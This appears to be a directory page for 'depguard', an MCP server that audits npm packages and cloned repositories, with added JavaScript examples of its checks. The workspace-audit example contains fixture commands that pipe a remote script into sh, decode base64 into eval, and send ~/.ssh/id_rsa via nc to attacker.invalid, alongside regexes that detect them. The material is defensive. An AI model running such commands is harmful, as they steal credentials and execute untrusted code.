Glama

Server Configuration

Describes the environment variables required to run the server.

Name: GITHUB_TOKEN
Required: No
Description: GitHub token used for higher rate limits on the GitHub Advisory API (optional).
Default: (none listed)

Capabilities

Features and capabilities supported by this server

Capability: tools
Details: {}

Tools

Functions exposed to the LLM to take actions

Name / Description
depguard_guard

MANDATORY: call this BEFORE running npm install, yarn add, or pnpm add — whether the user asked for the package or you decided to install it yourself. Verifies the package exists (blocks hallucinated names), checks for typosquatting, runs security audit, and returns allow/warn/block. If the result is "block" or "warn", do NOT install the package without informing the user.

depguard_should_use

When you need functionality (e.g. "RTSP streaming", "date formatting"), call this BEFORE choosing a package yourself. Checks if Node.js has a native solution first, then evaluates npm candidates and recommends install, caution, or write-from-scratch. Always prefer this over picking a package from your training data — it gives you up-to-date security and quality data.

depguard_review

Call this AFTER making significant code changes or before the user commits. Scans source files for issues you may have introduced: console.logs left in production code, empty catch blocks, broken imports, TODOs without issue references, empty test files, orphan files. Fix the findings before reporting your work as done.

depguard_audit

Deep security audit of a single npm package. Downloads the tarball, scans source code for malware, checks vulnerabilities (npm + GitHub Advisory), analyzes install scripts, verifies license. Use when you need full details on a specific package. Pass a version to audit a specific installed version instead of latest.

depguard_audit_project

Audit ALL dependencies in a project at once. Scans direct deps (full audit), transitive deps from lock file (vulnerability check), and the packageManager field. Pass the path to package.json and get a consolidated security report. Use this when the user asks to review project security or after cloning a new repo.

depguard_remediate

Build a remediation plan for a project with known vulnerabilities. Reads package.json plus the lock file, runs the same audit as depguard_audit_project, then groups every vulnerable transitive dependency under the direct dependency that pulls it in. Output is sorted by severity weight, so the first entry is the highest-impact bump. Use this when the user is staring at "100 vulnerabilities found" from npm install and needs to know which five direct dependencies to upgrade. Read-only: never modifies package.json or the lockfile, and never runs npm.
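
The grouping step described above, as an added example that is not depguard's code: it walks the "packages" map of a lockfileVersion 3 package-lock.json using Node's nearest-node_modules resolution rule, collects every package reachable from each direct dependency, matches those against an advisory list, and sorts the direct dependencies by summed severity weight. The lock fragment, the advisories (EXAMPLE-* ids) and the weights are all constructed for this example.

```javascript
// Added example, not depguard's code. Groups vulnerable transitive dependencies
// under the direct dependency that pulls them in, from a package-lock.json
// (lockfileVersion 3) "packages" map. All data below is constructed.

// Assumed severity weights; depguard's actual weights are not documented here.
const SEVERITY_WEIGHT = { critical: 10, high: 7, moderate: 4, low: 1 };

// Constructed lock fragment. Keys are node_modules paths, as npm writes them;
// a nested "node_modules/<parent>/node_modules/<dep>" entry means that parent
// got its own copy because the hoisted version did not satisfy its range.
const lock = {
  lockfileVersion: 3,
  packages: {
    "": { dependencies: { "web-framework": "^1.0.0", "report-tool": "^2.0.0" } },
    "node_modules/web-framework": { version: "1.0.0", dependencies: { "old-parser": "^0.9.0", "tiny-util": "^1.0.0" } },
    "node_modules/old-parser": { version: "0.9.3", dependencies: { "tiny-util": "^1.0.0" } },
    "node_modules/tiny-util": { version: "1.2.0" },
    "node_modules/report-tool": { version: "2.1.0", dependencies: { "tiny-util": "^0.5.0", "color-lib": "^3.0.0" } },
    "node_modules/report-tool/node_modules/tiny-util": { version: "0.5.1" },
    "node_modules/color-lib": { version: "3.0.0" },
  },
};

// Constructed advisories (hypothetical ids, not real CVE/GHSA identifiers).
const advisories = [
  { id: "EXAMPLE-1", name: "old-parser", version: "0.9.3", severity: "high" },
  { id: "EXAMPLE-2", name: "tiny-util", version: "0.5.1", severity: "critical" },
  { id: "EXAMPLE-3", name: "color-lib", version: "3.0.0", severity: "low" },
];

// Mirror Node's module lookup: the nearest node_modules/<dep> walking up
// from the requiring package's own path.
function resolveDep(lock, fromPath, depName) {
  let base = fromPath;
  for (;;) {
    const candidate = `${base ? base + "/" : ""}node_modules/${depName}`;
    if (lock.packages[candidate]) return candidate;
    if (!base) return null;
    const idx = base.lastIndexOf("/node_modules/");
    base = idx === -1 ? "" : base.slice(0, idx);
  }
}

// Every lock entry reachable from rootPath, following the resolved edges
// (the visited set guards against dependency cycles).
function reachableFrom(lock, rootPath) {
  const seen = new Set();
  const stack = [rootPath];
  while (stack.length) {
    const p = stack.pop();
    if (seen.has(p)) continue;
    seen.add(p);
    for (const dep of Object.keys(lock.packages[p].dependencies || {})) {
      const r = resolveDep(lock, p, dep);
      if (r && !seen.has(r)) stack.push(r);
    }
  }
  return seen;
}

// "node_modules/a/node_modules/@s/b" -> "@s/b"
function nameFromPath(p) {
  return p.slice(p.lastIndexOf("node_modules/") + "node_modules/".length);
}

// Read-only: builds the plan without touching package.json or the lockfile.
function buildRemediationPlan(lock, advisories) {
  const plan = [];
  for (const direct of Object.keys(lock.packages[""].dependencies || {})) {
    const rootPath = resolveDep(lock, "", direct);
    if (!rootPath) continue;
    const findings = [];
    for (const p of reachableFrom(lock, rootPath)) {
      const name = nameFromPath(p);
      const version = lock.packages[p].version;
      for (const adv of advisories) {
        if (adv.name === name && adv.version === version) findings.push({ ...adv, path: p });
      }
    }
    if (findings.length === 0) continue;
    const weight = findings.reduce((sum, f) => sum + (SEVERITY_WEIGHT[f.severity] || 0), 0);
    plan.push({ direct, version: lock.packages[rootPath].version, weight, findings });
  }
  // Highest-impact bump first.
  return plan.sort((a, b) => b.weight - a.weight);
}

console.log(JSON.stringify(buildRemediationPlan(lock, advisories), null, 2));
```

With this data the plan lists report-tool first (its nested tiny-util 0.5.1 is critical, plus a low in color-lib) and web-framework second (a high in old-parser), while the hoisted tiny-util 1.2.0 that web-framework uses is correctly not blamed on it.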

depguard_audit_deep

Audit the full transitive dependency tree of a package. Crawls all nested dependencies recursively and aggregates vulnerabilities across the entire graph. Use when you need to know the total attack surface, not just direct deps.

depguard_sweep

Find unused npm packages in the project. Scans source files for imports and cross-references with package.json. Also detects phantom deps (installed but not declared). Call this after a coding session where you installed multiple packages — some may no longer be needed.
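
The cross-reference described above, as an added example that is not depguard's code: it pulls import specifiers out of constructed source files, maps each to a package name, and compares the result with package.json and with a constructed node_modules listing, separating unused, phantom (installed but undeclared) and missing (imported but not installed) packages. The regexes, the built-in and tooling lists, and all sample files are this example's assumptions.

```javascript
// Added example, not depguard's code. Extracts import specifiers from
// constructed source files, maps them to package names, and compares with
// package.json: declared-but-unimported (unused), imported-but-undeclared yet
// installed (phantom), and imported-but-absent (missing). depguard's real
// parsing rules are not documented here; the regexes below are this example's.

const pkg = {
  dependencies: { express: "^4.19.0", lodash: "^4.17.0", "left-pad": "^1.3.0", "@scope/ui": "^2.0.0" },
  devDependencies: { jest: "^29.0.0", typescript: "^5.0.0" },
};
// Constructed listing of what is physically present under node_modules.
const installed = new Set(["express", "lodash", "left-pad", "@scope/ui", "jest", "typescript", "chalk", "debug"]);
// Constructed sources covering ESM, CJS, dynamic import, subpath and scoped specifiers.
const sources = {
  "src/server.js": [
    "import express from 'express';",
    "const { pick } = require('lodash/fp');",
    "import fs from 'node:fs';",
    "import './routes';",
    "const c = require('chalk');",
    "const load = () => import('dotenv');",
  ].join("\n"),
  "src/ui.ts": "import { Button } from '@scope/ui/button';\nimport type { Theme } from '@scope/ui';\n",
  "test/app.test.js": 'const dbg = require("debug")("app");\n',
};

// Partial list of Node built-ins; "node:"-prefixed names are handled separately.
const BUILTINS = new Set(["fs", "path", "os", "crypto", "http", "https", "url", "util", "events", "stream", "child_process"]);
// Dev tools invoked from scripts rather than imported; excluding them keeps
// the unused list free of obvious false positives (assumed list).
const TOOLING = new Set(["jest", "typescript", "eslint", "prettier"]);

const SPECIFIER_RES = [
  /\bimport\s+(?:[^'"]*?\s+from\s+)?['"]([^'"]+)['"]/g, // import x from 'y'; import 'y'
  /\bexport\s+[^'"]*?\s+from\s+['"]([^'"]+)['"]/g,      // export { a } from 'y'
  /\brequire\s*\(\s*['"]([^'"]+)['"]\s*\)/g,            // require('y')
  /\bimport\s*\(\s*['"]([^'"]+)['"]\s*\)/g,             // import('y')
];

// "lodash/fp" -> "lodash", "@scope/ui/button" -> "@scope/ui"; relative paths,
// absolute paths and built-ins map to null.
function packageName(spec) {
  if (spec.startsWith(".") || spec.startsWith("/") || spec.startsWith("node:")) return null;
  const parts = spec.split("/");
  if (BUILTINS.has(parts[0])) return null;
  return spec.startsWith("@") ? parts.slice(0, 2).join("/") : parts[0];
}

function sweep(pkg, installed, sources) {
  const declared = new Set([...Object.keys(pkg.dependencies || {}), ...Object.keys(pkg.devDependencies || {})]);
  const used = new Map(); // package name -> Set of files importing it
  for (const [file, text] of Object.entries(sources)) {
    for (const re of SPECIFIER_RES) {
      for (const m of text.matchAll(re)) {
        const name = packageName(m[1]);
        if (!name) continue;
        if (!used.has(name)) used.set(name, new Set());
        used.get(name).add(file);
      }
    }
  }
  const unused = [...declared].filter((d) => !used.has(d) && !TOOLING.has(d));
  const undeclared = [...used.keys()].filter((u) => !declared.has(u));
  return {
    unused,
    phantom: undeclared.filter((u) => installed.has(u)).map((u) => ({ name: u, files: [...used.get(u)] })),
    missing: undeclared.filter((u) => !installed.has(u)),
  };
}

console.log(JSON.stringify(sweep(pkg, installed, sources), null, 2));
```

Phantom dependencies matter beyond tidiness: code that works only because a transitive package happens to be hoisted breaks silently on the next lockfile change, and a name that is imported but not installed is exactly the "broken import" that an attacker can later claim on the registry.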

depguard_score

Quick 0-100 quality score for a package. Faster than depguard_audit when you only need the score. A critical vulnerability caps the score at 30, a high-severity one at 50.

depguard_verify

Quick check if a package name exists on npm + typosquatting detection. Faster than depguard_guard when you only need existence verification without a full audit.
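
The existence-plus-typosquatting check that both depguard_guard and depguard_verify describe, as an added example that is not depguard's code: the registry snapshot and the popular-package list are constructed and held in memory so the code runs offline, where depguard queries npm live. Lookalikes are found with an optimal-string-alignment edit distance (one transposition counts as one edit) and a normalization that collapses separators and digit/letter confusables; the thresholds and the verdict mapping are this example's assumptions.

```javascript
// Added example, not depguard's code. Existence check against a constructed
// registry snapshot plus typosquat detection against a constructed list of
// popular package names. depguard queries npm live; this runs offline.

// Constructed registry snapshot. The last three names are squats that exist
// on this pretend registry, which is what makes "exists" alone insufficient.
const KNOWN_REGISTRY = new Set([
  "express", "lodash", "react", "axios", "chalk", "cross-env", "node-fetch",
  "expresss", "lodahs", "crossenv",
]);
const POPULAR = ["express", "lodash", "react", "axios", "chalk", "cross-env", "node-fetch"];

// Optimal string alignment distance: insert, delete, substitute, or swap two
// adjacent characters each cost 1, so "lodahs" is 1 away from "lodash".
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => {
    const row = new Array(b.length + 1).fill(0);
    row[0] = i;
    return row;
  });
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Collapse separators and digit/letter confusables so "crossenv", "cross_env"
// and "cr0ss-env" all normalize to the same key as "cross-env".
function normalize(name) {
  return name.toLowerCase().replace(/[-_.]/g, "").replace(/0/g, "o").replace(/1/g, "l");
}

function checkPackageName(name) {
  const exists = KNOWN_REGISTRY.has(name);
  const lookalikes = [];
  for (const popular of POPULAR) {
    if (popular === name) continue;
    const distance = editDistance(name, popular);
    const sameNormalized = normalize(name) === normalize(popular);
    // Assumed thresholds: one edit for short names, two for names of 8+ chars.
    const threshold = popular.length >= 8 ? 2 : 1;
    if (sameNormalized || distance <= threshold) {
      lookalikes.push({ popular, distance, reason: sameNormalized ? "separator/confusable" : "edit-distance" });
    }
  }
  // block: name is not published (hallucinated); warn: published but mimics a
  // popular name; allow: published with no lookalike.
  const verdict = !exists ? "block" : lookalikes.length ? "warn" : "allow";
  return { name, exists, lookalikes, verdict };
}

for (const n of ["express", "expresss", "lodahs", "crossenv", "totally-made-up-pkg"]) {
  console.log(JSON.stringify(checkPackageName(n)));
}
```

Note the two distinct failure modes: an unpublished name is blocked outright because installing it is impossible today and invites someone to publish it tomorrow, while a published lookalike is only a warning, since the user may genuinely want the less popular package.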

depguard_search

Search npm for packages by keywords, sorted by depguard quality score. Use when you need to find packages but already know the keywords.

depguard_audit_bulk

Audit multiple packages in one call. Accepts an array of names or a dependencies object from package.json. Use depguard_audit_project instead if you have a package.json path.

depguard_sbom

Generate a CycloneDX 1.6 Software Bill of Materials (SBOM) for an npm project. Reads package.json + lock file to enumerate direct + transitive components with PURLs and integrity hashes. Set includeVex=true to embed vulnerability data (VEX) from the audit pipeline. Use this when the user asks for an SBOM, a compliance report, or to comply with EU CRA / US EO 14028 requirements.

depguard_workspace_audit

MANDATORY: call this AFTER cloning a repository and BEFORE opening it in any IDE (VS Code, Cursor, JetBrains, etc.) or running direnv allow. Enumerates every file in the repo that auto-executes when the workspace opens: .vscode/tasks.json tasks with "runOn": "folderOpen", .vscode/settings.json shell overrides, .devcontainer lifecycle commands, .envrc, JetBrains run configurations, Makefile default targets, .gitattributes custom filter drivers, and committed git hooks. Classifies each as INFO / WARN / HIGH using false-positive-averse heuristics (a benign npm run watch stays INFO; only curl|sh, base64 decode chains, credential paths, and obfuscation escalate). This is the technical defense against fake-interview / take-home-test malware campaigns, where a coding-test repo compromises the developer's session before the IDE finishes loading.
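
The enumerate-then-classify procedure described above, as an added example that is not depguard's code: it covers a subset of the listed locations (VS Code folderOpen tasks, devcontainer lifecycle commands, .envrc, and hooks committed under .husky/), extracts the command each one would run, and classifies it INFO / WARN / HIGH so that ordinary build commands stay INFO and only the escalating patterns raise the level. The repository is a constructed in-memory map of path to file content, and the rule set is this example's assumption; depguard's own heuristics are not published on this page.

```javascript
// Added example, not depguard's code. Enumerates a subset of the auto-executing
// workspace files the tool lists (VS Code folderOpen tasks, devcontainer
// lifecycle commands, .envrc, committed husky hooks) and classifies each
// command INFO / WARN / HIGH. The repo is a constructed in-memory map and the
// rule set is this example's assumption; depguard's heuristics are not published here.

const repo = {
  ".vscode/tasks.json": JSON.stringify({
    version: "2.0.0",
    tasks: [
      { label: "watch", type: "shell", command: "npm run watch", runOptions: { runOn: "folderOpen" } },
      { label: "setup", type: "shell", command: "curl -fsSL https://example.invalid/setup.sh | sh", runOptions: { runOn: "folderOpen" } },
      { label: "bootstrap", type: "shell", command: "sh", args: ["-c", "$(printf '\\x65\\x63\\x68\\x6f hi')"], runOptions: { runOn: "folderOpen" } },
      { label: "build", type: "shell", command: "npm run build" }, // manual task: never auto-runs, so not reported
    ],
  }),
  ".devcontainer/devcontainer.json": JSON.stringify({
    postCreateCommand: "npm ci",
    postStartCommand: "cat ~/.ssh/id_rsa | nc attacker.invalid 4444",
  }),
  ".envrc": 'export NODE_ENV=development\neval "$(echo aGVsbG8= | base64 -d)"\n',
  ".husky/post-checkout": "#!/bin/sh\nnpm run lint\n",
};

const LEVEL_RANK = { INFO: 0, WARN: 1, HIGH: 2 };

// Ordinary build commands stay INFO; only these patterns escalate.
const RULES = [
  { level: "HIGH", reason: "remote script piped into a shell", re: /\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b/ },
  { level: "HIGH", reason: "base64 decode chain", re: /base64\s+(-d|-D|--decode)\b|\batob\(|Buffer\.from\([^)]*["']base64["']/ },
  { level: "HIGH", reason: "reads credential material", re: /\.ssh\/|id_rsa|id_ed25519|\.aws\/|\.npmrc|\.netrc|\.gnupg\// },
  { level: "WARN", reason: "eval or hex/base64-packed payload", re: /\beval\b|(\\x[0-9a-fA-F]{2}){2,}|[A-Za-z0-9+\/]{40,}={0,2}/ },
];

function classify(command) {
  let level = "INFO";
  const reasons = [];
  for (const rule of RULES) {
    if (rule.re.test(command)) {
      reasons.push(rule.reason);
      if (LEVEL_RANK[rule.level] > LEVEL_RANK[level]) level = rule.level;
    }
  }
  return { level, reasons };
}

// devcontainer lifecycle commands may be a string, an argv array, or an object
// of named parallel commands; flatten all three to one reviewable string.
function flattenCommand(v) {
  if (typeof v === "string") return v;
  if (Array.isArray(v)) return v.join(" ");
  return Object.values(v).map(flattenCommand).join(" && ");
}

const DEVCONTAINER_HOOKS = ["initializeCommand", "onCreateCommand", "updateContentCommand",
  "postCreateCommand", "postStartCommand", "postAttachCommand"];

function* autoExecCommands(repo) {
  for (const [path, content] of Object.entries(repo)) {
    if (path === ".vscode/tasks.json") {
      for (const t of JSON.parse(content).tasks || []) {
        if (t.runOptions && t.runOptions.runOn === "folderOpen") {
          yield { path, source: `task "${t.label}"`, command: [t.command, ...(t.args || [])].join(" ") };
        }
      }
    } else if (path === ".devcontainer/devcontainer.json") {
      const cfg = JSON.parse(content);
      for (const key of DEVCONTAINER_HOOKS) {
        if (cfg[key] !== undefined) yield { path, source: key, command: flattenCommand(cfg[key]) };
      }
    } else if (path === ".envrc" || path.startsWith(".husky/")) {
      for (const line of content.split("\n")) {
        const cmd = line.trim();
        if (cmd && !cmd.startsWith("#")) yield { path, source: "line", command: cmd };
      }
    }
  }
}

function auditWorkspace(repo) {
  const findings = [...autoExecCommands(repo)].map((item) => ({ ...item, ...classify(item.command) }));
  return findings.sort((a, b) => LEVEL_RANK[b.level] - LEVEL_RANK[a.level]);
}

for (const f of auditWorkspace(repo)) {
  console.log(f.level, f.path, f.source, JSON.stringify(f.command), f.reasons.join("; "));
}
```

The manual "build" task is deliberately absent from the report: the point of the audit is what runs without a keypress, and flagging every task in the file would bury the three HIGH findings (the curl|sh installer, the .envrc base64 chain and the devcontainer command that exfiltrates an SSH key) under noise.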

Prompts

Interactive templates invoked by user choice

No prompts

Resources

Contextual data attached and managed by the client

No resources

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/mopanc/depguard'
